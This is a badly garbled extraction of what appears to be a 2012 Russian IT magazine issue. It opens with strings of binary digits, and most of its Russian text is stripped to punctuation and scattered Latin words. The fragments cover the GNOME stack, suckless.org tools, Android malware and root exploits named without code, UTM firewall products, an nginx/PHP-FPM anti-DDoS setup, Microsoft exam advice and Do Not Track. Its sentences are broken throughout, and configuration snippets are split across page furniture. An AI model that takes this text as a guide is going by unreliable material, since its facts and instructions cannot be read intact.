01001001010101100100010010001111010111000111011010100100100111
0100100011110101110
0111101011100011101101010010010011110101010101010001001001010101
001111010101010101000100100101010110010001001000111101011100011
010101100100010010001111010111000111011010100100100111101010101
100011101101010010010011110101010101010001001001010101100100010
101010101000100100101010110010001001000111101011100011101101010
00010010001111010111000111011010100100100111101010101010100010
101010010010011110101010101010001001001010101100100010010001111
000111011010100100100111101010101010100010
000100100101010110010001001000111101011100011101101010010010011
110001110110101001001001111010101010101000
0001001001010101100100
0011110101110001110110101001001001111010101010101000100100101010
0100010010010101011001
0111000111011010100100100111101010101010100
10011110101010101010001001001010101100100010010001111010111000
010111000111011010100100100111101010101010
010100010010010101011
101010110010001001000111101011100011101101010010010011110101010
1111010111000111011010100100100111101010101
010101010001001001010101100100010010001
110001110110101001001001111010101010101000100100101010110010001
0001111010111000111011010100100100111101010
101010101010001001001010101100100010010
010101010100010010010101011001000100100011110101110001110110101
1101010101010100010010 01010101100100010
0010001111010111000111011010100100100111101
010001001000111101011100011101101010010010011110101010101010001
0010010001111010111000111011010100100100111
0111101010101010100010 01001010101100100
11010100100100111101010101010100010010010101011001000100100011
0100010010001111010111000111011010100100100
0100111101010101010100 01001001010101100
10001001001010101100100010010001111010111000111011010100100100
1100100010010001111010111000111011010100100
0100100111101010101010100010010010101011
101011001000100100
100011110101110001110110101001001001111010101010101000100100101
010010010011110101010101010001001001010
01010101100100010
010110010001001000111101011100011101101010
100100111101010101010100010010010101011001000100100011110101110
0101010110010001001000111101011100011101101
11010100100100111101010010101010001001001
001001010101100100
00101010110010001001000111101011100011101101010010010011110101
0100101010110010001001000111101011100011101
100011110101110001110110101001001001111010101010101000100100101
1101101010010010011110101010101010001001
001001001010101100
101110001110110101001001001111010101010101000100100101010110010
0100100101010110010001001000111101011100011
100100011110101110001110110101001001001111010101010101000100100
110101010101010001
010001001001010101
101010101010100010010010101011001000100100011110101110001110110
01010001001001010
000100100011110101110001110110101001001001111010101010101000100
011110101010101010
110010001001000111101011100011101101010010010011110101010101010
001000100100011110101110001110110101001001001111010101010101000
010101010001001001
11011010100100100111101010101010100010010010101011001000100100
011001000100100011110101110001110110101001001001111010101010101
01010101010001001
01010001001001010101100100010010001111010111000111011010100100
01011001000100100011110101110001110110101001001001111010101010
101010101010100010
100100011110101110001110110101001001001111010101010101000100100
011110101010101010
01010101100100010010001111010111000111011010100100100111101010
100100100111101010101010100010010010101011001000100100011110101
01001010101100100010010001111010111000111011010100100100111101
001001111010101010
001001010101100100010010001111010111000111011010100100100111101
00100100101010110010001001000111101011100011101101010010010011
101011100011101101010010010011110101010101010001001001010101100
01000100100101010110010001001000111101011100011101101010010010
10101000100100101010110010001001000111101011100011101101010010
01010101000100100101010110010001001000111101011100011101101010
10101010101000100100101010110010001001000111101011100011101101
11101010101010100010010010101011001000100100011110101110001110
00111101010101010100010010010101011001000100100011110101110001
00100111101010101010100010010010101011001000100100011110101110
0010010011110101010101010001001001010101100100010010001111010
01010010010011110101010101010001001001010101100100010010001111
01101010010010011110101010101010001001001010101100100010010001
11101101010010010011110101010101010001001001010101100100010010
10001110110101001001001111010101010101000100100101010110010001
011100011101101010010010011110101010101010001001001010101100100
10101110001110110101001001001111010101010101000100100101010110
011110101110001110110101001001001111010101010101000100100101010
100011110101110001110110101001001001111010101010101000100100101
100100011110101110001110110101001001001111010101010101000100100
00010010001111010111000111011010100100100111101010101010100010
10010001001000111101011100011101101010010010011110101010101010
010110010001001000111101011100011101101010010010011110101010101
10101011001000100100011110101110001110110101001001001111010101
10010101011001000100100011110101110001110110101001001001111010
010010010101011001000100100011110101110001110110101001001001111
10001001001010101100100010010001111010111000111011010100100100
01010001001001010101100100010010001111010111000111011010100100
10101010001001001010101100100010010001111010111000111011010100
GNOME 1997 KDE,

Qt.

, KDE, 2000 Qt , GNOME
.
Linux. GNOME
, Ubuntu, Fedora,
OpenSUSE, .
, 3.0,
, , GNOME ,

.
UNIX ?
.
GNOME .
,
. GNOME
GTK ;
, CORBA,
D-Bus;
;
,
GNOME 3.

GNOME
. ,
KDE, GNOME

, , . , GNOME GTK,
Gimp,

Metacity,
102
-
GStreamer, , , ffmpeg. Firefox

Epiphany.
GNOME

,

.
,
, libgnome .

,
, ,
.
GNOME
,

.
,

.
07 /162/ 2012
GNOME
,
, .

,
GLib, GObject, libgnome, D-Bus
GVFS. GNOME,
.

GLib,
libc. GLib
,

. ,
,
,
, , , .ini-
.
GLib
GTK+,
,

. ,
GLib MC.
GLib
GNOME GObject.
(),
GNOME, GTK+.
GObject
( ),
, ,
.
GLib GObject
libgnome,
,

.
GLib-
, , ,
.
,
GLib
, GNOME.
GNOME
D-Bus,
. D-Bus

freedesktop.org UNIX. D-Bus
RCP CORBA,
07 /162/ 2012
GNOME ,
DCOP, KDE 3.
D-Bus
Linux-,
udev,
.
D-Bus GNOME
GVFS,
, FUSE.
GVFS , API GIO
. GVFS GIO ,
FTP- SMB-.
GVFS GNOME
GnomeVFS,
,
GnomeVFS.

GNOME
,
GTK+,
Pango, Cairo, , ATK, Clutter WebKit.
GTK+,

GIMP, GNOME

. GTK+
(): , , ,
,
.
2.8, GTK+

Cairo,
. Cairo
X Window, -
Microsoft Windows, BeOS, OS/2, Linux

Framebuffer
, PNG,
PDF SVG.
GTK+ Pango,
. Pango

, ,
( ,
). Pango GTK+;
, ,
Firefox GNOME.
GTK+ ATK,

.

(,
)
- .

,
, Clutter. Clutter

GNOME Shell,
.

. OpenGL
,
.
Clutter Intel
Moblin ( MeeGo
Tizen), .

GNOME
Cinnamon GNOME 3
103
UNIXOID
GNOME 1.0
WebKitGTK+ WebKit, GTK+.

- , Epiphany,
Evolution GNOME Shell.
GNOME Shell, GNOME 3,
JavaScript
Gjs, SpiderMonkey GObject.
GNOME
,
. : PulseAudio, Canberra
GStreamer.
PulseAudio ,
, ,
, , , .
,
,

. PulseAudio GNOME
ESD,
Enlightenment.
PulseAudio GStreamer,
,
- . GStreamer
,
.

,
PulseAudio (ALSA, OSS,
), ,
X Window. API,

.

Canberra.
104
GNOME 3.0
GNOME ,

(IM). : Avahi,
GUPnP, NetworkManager Telepathy.
GNOME
NetworkManager, , Ethernet-,
Wi-Fi-,
Bluetooth-. NetworkManager

, ,
DHCP IP- DNS-. NetworkManager
,
GNOME

.
GNOME Avahi,
Zeroconf,
IP-
. Avahi
, IP- 169.254.* (
DHCP-),
.local
UPnP,
GUPnP. Avahi
/
, ,
.

Telepathy,

. Telepathy
, Empathy,
,

, ,
, , .
, Sudoku
Tetris ,
AbiWord ( AbiCollab) . Telepathy

.

,

,
GNOME
.
Multimedia
User Interface
Communication
Data Storage
Utilities
GTK+
Cairo
Clutter
GStreamer
Telepathy
EDS
Champlain
ATK
Pango
Webkit
Canberra
Avahi
GDA
Enchant
Pulseaudio
GUPnP
Tracker
Poppler
Core
GIO
Glib
GObject
Desktop Integration
System Integration
upower
GeoClue
udisks
policykit
packagekit
libnotify
gnome-keyring
GNOME 3.0
07 /162/ 2012
EDS,
GDA, Tracker, GNOME Keyring. EDS (Evolution
Data Server) ,
, .

, .
, Empathy

Empathy, -
IM-. , , ,
. GDA
(GNOME Data Access)
,

.
Tracker GNOME .

KDE4
API Nepomuk, ,
. Tracker ,
,
.
,
,
, .
,
GNOME,
GNOME Keyring,
.
,
, , KeePassX ,

. ,
- GNOME Keyring ()
,
, Keyring,

.

GNOME ,
.
: UPower, UDisks PolicyKit.
UPower
sysfs,

D-Bus,
( , ).
GNOME
, ,
07 /162/ 2012
INFO
xine
aRts
KDE 3
libao
aRts
ALSA
PulseAudio
GNOME (libgnome)
ESD
MPlayer
GNOME ,

HIG (Human Interface Guidelines),

Mac OS X KDE4.
libao
PulseAudio
libxine Pulse
libalsa Pulse
UNIX/NCP
libgnome
EsounD
Zerconf
HAL
PulseAudio
ALSA
RTP
OSS
2000

GNOME Foundation.

GNOME
C#,
ALSA
RTP
GNOME

1997

KDE,

QT.
HAL
OSS
HAL

GNOME
1999 .
Linux
TCP/IP
ALSA/OSS

PulseAudio
,
RTP
PulseAudio
,

. UDisks ,
. ,
,
UDisks ,
.

. -
UPower UDisks HAL,
udev HAL
,
freedesktop.org.
,

UPower UDisks, -
2005

GNOME

.

GNOME 3

GNOME 2,
Linux Mint
GNOME 3
Cinnamon
(cinnamon.linuxmint.
com).
, GNOME
freedesktop.org
PolicyKit (polkit). D-Bus

.
Linux, GNOME ,
,
. , freedesktop.org,
,
,

- . z
105
UNIXOID
(execbit.ru)

SUCKLESS.ORG

Linux-,
,

,
,

- .
suckless.org
,
,
.
106
UNIX
,
.
2
8 , , , ,
. ,
, , ,
HIG rich user interface,
,
.
; UNIX

, ,
.
.
,
UNIX.

.
, ,
UNIX?
SUCKLESS.ORG
, dwm, dmenu surf. ,
,
,
suckless.org.
10 ,

.
,
. ,
dwm (dynamic window manager)
,
, , , ,
.
,

. , dwm
dmenu,
,
,
.
, /usr/bin (
)
.

surf,
,

dwm
( )
tabbed,
(
07 /162/ 2012

wmii
dmenu ,

Acme Plan 9, wmii
fluxbox).
st.

,
, ,

.
suckless.org
.
:
wmii , Acme Plan 9 Oberon;
dwm ,
wmii;
surf -
WebKit;
st ,
;
9base UNIX-,
Plan 9;
dmenu ,
,
;
ii IRC-, ;
sandy , ,
;
slock
;
svkb ;
07 /162/ 2012
tabbed .
WMII
wmii (Window Manager Improved Improved)
X Window,
Acme
Plan 9
/
.

suckless.org,

, Google Code: code.google.com/p/wmii.
wmii
, (,
wmi) ,
,
.
suckless.org
,
,
.
wmii ,

,

.
. -, wmii , ,

. -,
wmii
,
.
:
.
,
,
,
,
, :
,
.

, ,

. ,
, .

: , ,
jabber-,
, .
DE, , ,

, ,
,
107
UNIXOID
(
16:9).
,
?
,
. ,
, jabber-
.
,
, .
, .
, Gimp
. wmii
.
, wmii, ,

( , ),

. , ,
,
. ,
, jabber-
work web.
,
. , wmii

.
wmii
Plan 9,

.
wmii
,
. ,
, :
wmii,
,
, .
, dwm

.
wmii, ,
,
. dwm
,
, ,
,

X Window:
$ xsetroot -name `date`
,
,
,
.

,

config.h
,
.
,
. dwm
,

.
SURF
- surf (surf.suckless.org)
, . WebKit
- ,
.
surf , -,
. surf
,
, .

, dmenu,
<Ctrl+g>.

, dwm wmii,
INFO

suckless.org ,

UNIX;
,

.
$ wmiir read /tag/sel/index
0x1000004
:
dwm ,
$ echo test+terms | wmiir write \

/client/0x1000004/tags
suckless.org

-
werc,
sh-,

Mercurial.

suckelss.org software that sucks less

,
,
(

).
:
$ echo "send sel left" | wmiir write \
/tag/sel/ctl
, ,
.
DWM
dwm (dwm.suckless.org)
suckless.org
.
2000 ,
, -
108
, dwm
07 /162/ 2012
, dzen
surf Google
st
tabbed. ,
CSS- cookies,
,
( - ?)
.
sh,
.
, surf -
. , Google surf
:
.
, awk, cat, dd, diff, du, echo, ls, mkdir,
.
9base - ,

sta.li.
. ,
, :
#!/bin/sh
query=ècho $@ | tr ' ' '+'`
surf http://www.google.ru/search?q=$query

surf.
ST
suckless.
org st (st.suckless.org), ,
, . VT100, 256 ,
UTF-8, / X11, .
, ,
10 000 ,
config.h.
st
,
, , suckless.org,

, xterm.
9BASE
9base UNIX,
,

Plan 9, Linux/
FreeBSD/MacOSX plan9port. 9base ,
-
07 /162/ 2012
STA.LI
suckeless.org sta.li
(STAtic LInux),
UNIX-,
KISS ,
.

,

. .
sta.li ,

, Linux.

, ELF,
,
(,
a.out). , ,
,
,
,
.

, (, USB-).
(initrd, initramfs),
, ,
RAM-. , , (
, ,
256
128 ).

lilo. ,
-
,
rsync, ,
-
/bin
/boot
/dev
/etc
/svc ,
/home
/root
/var
(spool, run, log,
cache)
/share man-,
/devel

/usr, /sbin, /usr/local , Linux, .

, ,
,
-,
UNIX KISS
. ,
: UNIX/
Linux
,

. z

,
suckless.org,
. , ,
e-mail- dmc (hg.suckless.org/dmc),

dzen (goo.gl/8kOGN)
passman (goo.gl/HrMpj).
109
UNIXOID
(androidstreet.ru)
-

Google
. ,
,
,

Google Play.
,
Android ?
110
, ,
ANDROID

Android 2010 Trustwave DEF CON.
- Android
FakePlayer,
,
.

Android
,
. 2011
, 65%
Android,

.

, Google
,
Android
.

Android ,
.
-,
.

,
; -,
07 /162/ 2012
Android
, ; ,

AirPush, Android; ,
, .

, , Google Play (
Android Market).
? .
-.
. -
, ,
. -
(FakePlayer
13 ),

,
.
(Opera Mini, ICQ, Skype, Angry
Birds),
, .
- ,
,
.
malware,
Android.SmsSend.
07 /162/ 2012
. ,

, ,
.
Android Android.
Geinimi,
. Geinimi
Lookout Mobile
Security 2010 .
,

, IMEI IMSI
.
,
(,
).
Geimini
,
, . Geinimi
,

.
. ,
Google Play. ,
,
,
(
).
,

.
,
,

. , :

(
).
.
, .
,
,

.
,
,
(, Skype),
.

,

,
(Adware.Airpush, Adware.Leadbolt,
Adware.Startapp ).
111
UNIXOID
Android Android

API
Android, . , ,
, -
.
, ,

Google Play, .
,

Android.
.
2011 Android 2.3
- Android,
SD
. ,
,
. ,
.
, 2012-, ,
, , ,
SD-.
,
, SD- ,
.
,
, ,
, -.
-
112
, .
, , Google,
SD- ,
,
.
, Google ,

. , -
, .
2011
Trustwave
Android API. ,
,
,

. ,
,
,
. ,
Facebook,
Facebook
. -
,
, , .

Android
2011 .
,

, HTC, Motorola
Samsung. ,
, Android,
, . -
13 , 11
.

.
Android.
SmsHider,
, .
Android,
:
,
,
.

,

.

AOSP, ,
,
;
,

. CyanogenMod,

.
, TapLogger,
, ,
. ,
.

.

. , , ,

. ,
,
, ,
. ,
Android
07 /162/ 2012
Lookout DroidDream
( )
, ,

.

,
. , Linux
root
,
( Android.
Anzhu), ,
(DBF
BootKit ,
).
,
, .
Exploid, RageAgainstTheCage,
KillingInTheName, ZimperLich, GingerBreak
,
hotplug, bionic .

/system/bin/su,

root-, ,

root, .
, root , ,

. ,

.
, .

Android-, Play Market,

.
.
.
,
Skype,
1500
Android, Sensation
. ,
, -,
,
.
-.

Android-. Crusewind,

,
.
.
Google Play. Google
( Android Market).
2011 , 21 DroidDream
.
,
. ,
07 /162/ 2012

,

Google Play, . .
. .
, .
,
.
.
. -,
.
,

.
113
UNIXOID
MYAndroid Protection Antivirus
NQ Mobile Security
Zoner AntiVirus Free
Android.Haktool.Faceniff.A 2012
Google ,

56, 200 000
. ,
Symantec, Samsung Lookout,
, Google
Android Market Security Tool,
. Symantec
13 , Android.
Counterclank,
Google Bouncer
,
.
?
, , .
? :
99% ,
, Google Play,
Amazon Appstrore GetJar. ,
, ,
,
.
-
( ,
Google
, ), ,
, , . :
, Android
,
,
AV-Test ( 90% ):
avast! Free Mobile Security
Dr.Web anti-virus Light
F-Secure Mobile Security
IKARUS mobile.security LITE
Kaspersky Mobile Security (Lite)
Lookout Security & Antivirus
McAfee Mobile Security
, ,
: , , , .

, ,
, . , ,
,
.

CyanogenMod MIUI, .
,
. CyanogenMod
MIUI,
,
(MIUI ,
).
Android ,
. ,
, ,
,
, , Android 2011 .
,
,
,
. z
TapLogger
114
07 /162/ 2012
SYN/ACK
SYN/ACK
grinder (grinder@synack.ru)

UTM-
,

. IT-, UTM
,
.
116
0116
07
07 /162/
/162/ 2012
2012
UTM?

,
.
,
.
.

, UTM (Unified Threat Management,
).
UTM :
DPI (Deep Packet Inspection), (IDS/IPS), , .
VPN,
, ,
.
, .
, .
UTM, , , / .
UTM
2530% ( firewall),
,
, . ,
,
, , .
,
,
. :
UTM-
, IPS, VPN
. UTM
, ,
. ,
,
, CPU.
,
.
opensource- (Untangle, pfSense, Endian
- FortiGate
07
07 /162/
/162/ 2012
2012
), .
.
FortiGate
: FortiGate
: fortinet-russia.ru
:
:
Fortinet, 2000 , UTM-,

(FortiGate-30) (FortiGate-5000).
FortiGate ,
.
, IDS/IPS, ,
, - .
DLP, VoIP, , WAN, ,
, PKI .
( ).
, ,
. -
75 , ,
. , .
(Skype, P2P, IM )
, traffic shaping
. .
LAN
WAN-,
RIP, OSPF BGP.
: ,
NAT, FortiGate
. Wi-Fi FortiWiFi.
( Windows, Android), ,
- FortiClient,
firewall Check Point
117
0117
SYN/ACK
SYN/ACK
(firewall, , SSL IPsec
VPN, IPS, -, ). Fortinet
FortiManager FortiAnalyzer.
- , FortiGate/FortiWiFi FortiExplorer
( Win Mac OS X),
GUI CLI ( Cisco).
FortiGate FortiASIC, , .
FortiOS.
Check Point UTM-1

: Check Point UTM-1
: rus.checkpoint.com
:
:
Check Point
UTM: UTM-1, UTM-1 Edge ( ) Safe@Office ( ).
: , IPS, , , SSL VPN . , (
200 ),
IM, P2P- Skype. -
URL-, Check Point , . HTTP/FTP/SMTP/POP3/IMAP, . UTM-1
W Wi-Fi. IPS
:
, ,
. , 10%
, .

UTM. - IP-, , .
OSPF, BGP RIP, -
(, RADIUS,
SecureID ), DHCP.
, Software
Blades ( ) ,
. , Web Security
( -), VoIP ( VoIP),
Advanced Networking, Acceleration & Clustering ( ). ,
Web Application Firewall Advanced Streaming Inspection,
Web Security, , TCP-,
, ,
.
Telnet/
SSH.
Check Point SmartCenter,
Security Management Architecture
Check Point, . SmartCenter , ,
LDAP, , .
UTM Check Point
Update Service.
ZyWALL 1000
: ZyWALL 1000
: zyxel.ru
:
:
, ZyXEL, -
UTM,
ZyWALL USG 50/100/300/1000/2000,
( 500 ).
ZyXEL . , ZyWALL 1000 ,
. , IDS/IPS, (Blue
Coat Commtouch), VPN (IPsec,
- ZyWALL
118
0118
07
07 /162/
/162/ 2012
2012
Untangle
SSL L2TP over IPsec VPN). ,

. - IPsec
VPN SSL VPN DES 56 .
(IP, ).

IM, P2P, VoIP, mail . IDS , , , DDoS . (Anomaly Detection
and Prevention) 2-
3- OSI, , 32 . End Point Security
, ,
firewall, , , .
, .
.
LDAP, Active Directory, RADIUS, . VoIP SIP .323
firewall NAT, VPN-.

( Commtouch, VPN)
. CLI -.
.
Untangle Server
: Untangle Server 9.2.1 ruiser
: untangle.com
: GPL
:
: x86, x64
:
Pentium 4 AMD, 1 RAM, 80 HDD, 2 NIC
*nix- UTM,
. :
,
07
07 /162/
/162/ 2012
2012
Untangle
, , ,
. , opensource-.
Untangle, ,
2008 , . Debian, .
Untangle Gateway
( 300 )
Forefront TMG
.
, Untangle Server. 5000 .
Untangle
. -
,
, . (Premium, Standard, Education Premium, Education Standard
Lite), ,
: Filter Services.
opensource- Lite,
13 ,
spyware, , , , , IDS/IPS, OpenVPN,
(Captive Portal). opensource, Snort, ClamAV, SpamAssasin, Squid.
, Untangle : , NAT, DMZ, QoS, DHCP- DNS-.
Reports, Lite,
UTM
DPI,
(IDS/
IPS), ,

119
0119
SYN/ACK
SYN/ACK
: , ,
, ; e-mail PDF, HTML,
XLS, CSV XML.
:
Failover, ,
Active Directory,
. , . ,
Untangle.
,
Java,
. Untangle
*nix, ,
. ,
, .
Endian Firewall
: Endian Firewall Community 2.5.1
: endian.com/en/community
: GPL
: x86
: CPU 500 , 512 M RAM, 2 HDD
Endian Firewall
, ,
. . GPL,
ISO- Community
Edition .
CentOS Linux ,
, IDS/IPS, HTTP/FTP/POP3/SMTP-, ,
, - -, .
VPN OpenVPN IPsec . 20 , blacklist .
ACL,
, , IP, . , , .
e-mail .
, Active Directory, LDAP
Snort Endian Firewall
RADIUS. VLAN,
QoS; SNMP. ClamAV,
Sophos.
- .
,
, (LAN, Wi-Fi, DMZ).
IP-, MultiWAN.
RED,
ORANGE, BLUE GREEN, firewall ,
.
, ,
.
, UTM , , ,
LAN.
.
OpenSource Endian Firewall Untangle. z
INFO
UTM
KERIO CONTROL
UTM (Charles
Kolodgy) IDC (International Data Corporation) Worldwide
Threat Management Security Appliances 2004-2008
Forecast ( 2004 ),

,
.

(firewall, DPI ), ,
UTM-,
.
Kerio Control (kerio.ru/ru/control)

. Kerio WinRoute Firewall
,
, .
UTM-,
NAT -, (
), , - -
(53 ), ,
, WAN, VPN-,
. Kerio Control Windows,
.
-.
120
0120
UTM
firewall,

.
07
07 /162/
/162/ 2012
2012
SYN/ACK
SYN/ACK
(execbit.ru)

NGINX + PHP-FPM +
TEST-COOKIE + GEOIP +
NAXSI
122
0122
- Apache
.
nginx ,

, -.
,
?
07
07 /162/
/162/ 2012
2012
, ,
-,
.
, ,
PHP, DDoS
. FastCGI-
Apache suexec suphp,

nginx.
FastCGI- PHP-FPM,
. PHP-
, .
DDoS testcookie-nginx-module,
, HTTP cookie .
geoip,
IP- .
,
.
Debian (Ubuntu),
- Arch Linux, FreeBSD.
.
NGINX, MYSQL, PHP-FPM

nginx, MySQL PHP:
$ sudo apt-get install mysql-server mysql-client \
php5-fpm php5-mysql nginx
nginx:
# vi /etc/nginx/nginx.conf
#
#
#
worker_processes 4;
# gettimeofday(),
#
timer_resolution 100ms;
}
http {
#
include
/etc/nginx/mime.types;
access_log /var/log/nginx/access.log;
# keepalive-
# 2
keepalive_timeout 2;
#
# ( Debian-like
# )
include /etc/nginx/sites-enabled/*;
}

,
. : /home/
_/, ,
www logs, , -, .

IP , www , ,
- .
Apache, nginx .
nginx ,
include ( ).
, :
# vi /etc/nginx/sites-avalible/template
server {
listen 80;
server_name _HOSTNAME_;
access_log /home/_USERNAME_/logs/_HOSTNAME_.access_log main;
error_log /home/_USERNAME_/logs/nginx/_HOSTNAME_.access_log info;
root /home/_USERNAME_/www/_HOSTNAME_;
}
events {
# ,
#
worker_connections 4096;

, /etc/nginx/
sites-enabled/. :
UNIX-,
www-users,
www logs.
,
, _HOSTNAME_ ,
nginx.conf
PHP-FPM
error_log
pid
/var/log/nginx/error.log;
/var/run/nginx.pid;
07
07 /162/
/162/ 2012
2012
123
0123
SYN/ACK
SYN/ACK
(execbit.ru)
fastcgi_param PATH_INFO $fastcgi_script_name;

include /etc/nginx/fastcgi_params;
}
CGI- , ,
/var/run/php5-fpm/_USERNAME_.sock,
PHP-FPM.
PHP,
:
nginx + PHP-FPM Apache + mod_php
_USERNAME_ ( ), www . /etc/nginx/sites-enabled/,

- . , , .
, ( ssh-)
-,
PHP MySQL. FastCGI
, PHP-

.
, CGI-
PHP-FPM (PHP FastCGI Process Manager),
PHP- PHP- . ,
, (
):
# vi /etc/nginx/sites-avalible/template
location ~ \.php$ {
try_files $uri =404;
fastcgi_pass unix:/var/run/php5-fpm/_USERNAME_.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME \
$document_root$fastcgi_script_name;
# vi /etc/php5/fpm/template
[_USERNAME_]
# UNIX-
listen = /var/run/php5-fpm/_USERNAME_.sock
#
listen.owner = _USERNAME_
listen.group = www-users
listen.mode = 0600
# ,
# PHP-
user = _USERNAME_
group = www-users
#
pm = dynamic
#
pm.max_children = 50
# ,
pm.start_servers = 20
#
#
pm.min_spare_servers = 5
pm.max_spare_servers = 35

. ,
- NGINX NAXSI
Naxsi (Nginx Anti XSS SQL Injection)
Web Application Firewall nginx,
, -, SQL
Injections, Cross Site Scripting, Cross Site Request Forgery, Local &
Remote File Inclusions. ,
Naxsi , ,
,
HTTP-. ,

404. :
. ,
.
2011- Google
Code (naxsi.googlecode.com),
OWASP.
Linux ( , Debian/Ubuntu) FreeBSD.
nginx (--add-module=../naxsi-x.xx/naxsi_src,
124
0124
naxsi ).
http include /etc/nginx/naxsi_core.
rules, .
location
( default_location_config.example).
, , CheckRule
. Naxsi
whitelist, .
LearningMode Naxsi
( LearningMode Naxsi ,
,
). ,
CheckRule .
, ,
rules_generator.py,
WL.
(grinder@synack.ru)
07
07 /162/
/162/ 2012
2012
Wiki-, PHP-FPM
UNIX-
,
/etc/php5/fpm/pool.d/_.conf
PHP-FPM /etc/init.d/php5-fpm reload. , Wordpress,
PHPMyAdmin, Drupal . nginx
- .
NGINX DDOS
- , . -,
nginx,
(][_07_2010). -, - DDoS. ,
, DDoS - ,
, . SYN/ACK UDP iptables,
. DDoS-,
-, ,
(HTTP-). , ,
.
-
, , ,
. ,
PHP, eAccelerator
( ),
PHP-FPM
, .
. , .
, ,
DDoS- .
,
, 90% ,
cookie,
JavaScript HTTP-.
testcookie-nginx-module.
,
GET-
cookie. -
,
cookie, .

, URL.
nginx :
- . :
$
$
$
$
$
$
$
$
sudo apt-get install build-essential

cd /tmp
wget http://goo.gl/Mh7IJ
wget http://goo.gl/gyvs3 -O test-cookie.tar.gz
tar -xzf nginx-1.2.0.tar.gz
tar -xzf test-cookie.tar.gz
cd nginx-1.2.0
./configure --prefix=/usr/local \
--add-module=kyprizel-testcookie-nginx-module-*
$ make
$ sudo apt-get remove nginx
nginx-testcookie-module ( JavaScript JavaScript)
07
07 /162/
/162/ 2012
2012
125
0125
SYN/ACK
SYN/ACK
(execbit.ru)
$ sudo make install
DDoS . DDoS
,
. , ,
IP- . ,
,
.
, , geoip.
nginx,
. , IP- :
nginx:
$
$
$
$
$
$
cd /tmp
wget http://goo.gl/H08BC
cd /etc/init.d/
sudo tar -xjf /tmp/nginx-init-ubuntu_v1.2.1.tar.bz2
chmod +x nginx
sudo update-rc.d -f nginx defaults
, nginx , testcookienginx-module - ( http):

# vi /etc/nginx/nginx.conf
http {
#
testcookie on;
# cookie
testcookie_name BPC;
# , cookie
testcookie_secret keepmesecret;
#
testcookie_session $remote_addr;
# GET- cookie
testcookie_arg attempt;
# cookie
testcookie_max_attempts 3;
# GET-
testcookie_get_only on;
}
$ cd /etc/nginx/
$ sudo wget http://goo.gl/hzB5W
IP- nginx
( http):
geoip_country /etc/nginx/conf/GeoIP.dat
:
if ($geoip_country_code = CN) {
return 444;
}

.
, testcookie off;
/etc/nginx.d/sites-enabled/ (
,
,
). . doc/usecases.txt ,
, ,
AES-128 JavaScript-.
.
CN ,
, 444 -.
,
.
.
nginx -
, . Apache,
. PHP-FPM -DDoS
,
, . z
WWW

server_name_in_redirect off;
listen 80;
server_name _;
access_log /var/log/nginx/$host.access_log main;
error_log /var/log/nginx/logs/$host.access_log info;
root /var/www/$host;
,

,
:
# vi /etc/nginx/sites-enabled/default
server
{
if ($host ~* www\.(.*))
{
set $host_without_www $1;
rewrite ^(.*)$ http://$host_without_www$1/ permanent;
}
126
0126
}

/var/www/.
,
mkdir /var/www/exemple.com,
.
habrahabr.ru/
post/139931/

testcookienginx-module
.
habrahabr.ru/
post/141989/
cookie
Flash.
WARNING

nginx

.
07
07 /162/
/162/ 2012
2012
SYN/ACK
SYN/ACK
(irud@live.ru)
MICROSOFT
FAQ

,
,

.
128
0128
2012
07
06 /162/
/161/ 2012
Drupal
?

.
Microsoft .
- ( MCM/MCA) , ,
, . ,
-
.
( MCTS/MCITP).
,
-
. , .

,

,

MCTS/MCITP,
. Prometric ( -)
.
.
,
( ).
Prometric,
, 500600
.
, ,
. , , . .
,
. ,
Finish.
.
?
, , . :
. , ,
. , , -
,
, .
.
: ,
, .
,
, - . , ,
,
, .
, . ,
,
. ? ,
.
,
.
?
, , . ,
,
, .
?
-,
. ,
Microsoft
2012
07
06 /162/
/161/ 2012
129
0129
SYN/ACK
SYN/ACK
, Microsoft
.
, .
, ,
-.
?
-
.
, , ,
.
, , , .
, , ,
,
.
?
Microsoft . , , MCSE, ,
WSUS.
, NAP
Microsoft,
90% . , .
? , . : ) ; ) ;
) ; ) ? , .
, , : ,
. , ,
, ,
. , ,
, .
. , ,
, - .
(irud@live.ru)
Microsoft

. .
Present Simple
. -,
, ,
, .

?
, . ,
, ,
. ,
.
. , , ,
.
, ,
, . , , .
,
, . ,
, - ,
. , , , ,
, .
, MCSE
. ? 80%
. ,
- .
, .
, Microsoft
2006-,
.
Microsoft 1000- 700. ,

. , , , .
, ,
.
(, 70-662: www.microsoft.com/learning/en/us/exam.
aspx?id=70-662).
. , ,
.
1. . ,
, . ,
, , , , . -
. Measure up
. , ,
, -
?
,
. . -, - ,
130
0130
2012
07
06 /162/
/161/ 2012
Drupal
.
(MOC) .
. , Backup/
Restore Exchange. ,
( , ,
, Dial Tone ).
, ,
.
, ,
(
).
100%- .
2. . MCTS Self
Paced Training Kit
, -
, - Exchange,
SharePoint. , 16
RAID-. Self Paced Training
Kit , :
Self Paced . Training Kit ,
.
,
8001500 .
.
MCSE. , - . ,
.
3. .
. , , ,

. , . , - .
: .

. ,
,
80
?
. , ,
80 .
,
, . Measure up,
, .
. ,
, , . , ,
.
. ,
. Exchange 2010, , ,

, Lotus.
( ),
,
. / -. ,
, .
. , ,
, , , .
, .
- , .
, . ,
.
. ,
?.
, - . ,
( ) .
.
2012
07
06 /162/
/161/ 2012
700 , , , . , . ,

MCTS .
,
, , .
,
.
, . ! z
131
0131
Mifrill (mifrill@real.xakep.ru)
DO NOT TRACK
do not track . , , , - ,
? , Twitter,
Do Not Track .
132
07 /162/ 2012
Do Not Track

. , , .
:
.
,
. .
Google,

. , Facebook
<bgsound>
e-mail.
,
.
, , :
, . ,
, .

( ,
),
. Do
Not Track ,

- .

Do Not Track, .
, .
, Do No
Track? HTTP-,
: 1 (DNT: 1)
,
; 0 ; null
. ,
1,
.

, 2009 Firefox
, DNT-
,
?
(SEO)
(donottrack.us).
Firefox 4. 2010
Microsoft,
Do Not Track IE9. Do
Not Track
Mozilla Firefox, Apple Safari
Opera. , HTTP-
DNT , Firefox
DOM-
Do Not Track JavaScript.
, Chrome?
. ,

,
Chrome . Chrome, , Keep My Opt-Outs. :)
DNT ,

,

. Do Not Track
(W3C).
Twitter Do Not Track
07 /162/ 2012
DNT ?
. , ,
Ghostery, ScriptNo, Adblock Plus ( Tor,
),
. DNT

.
,
Google, .

cookie (, -
, e-mail )
YouTube
cookie , DNT.
, Internet and Society
,
.
64
Advertising Option Icon
Do Not Track. , 33
cookie
,
.
, , Do Not Track .
, . ,
Do Not Track Twitter!

,
,
,
.
Do Not Track
, .
, Do-Not-Track
Online Act of 2011.

. ,
,
.
, ,
DNT ,
,
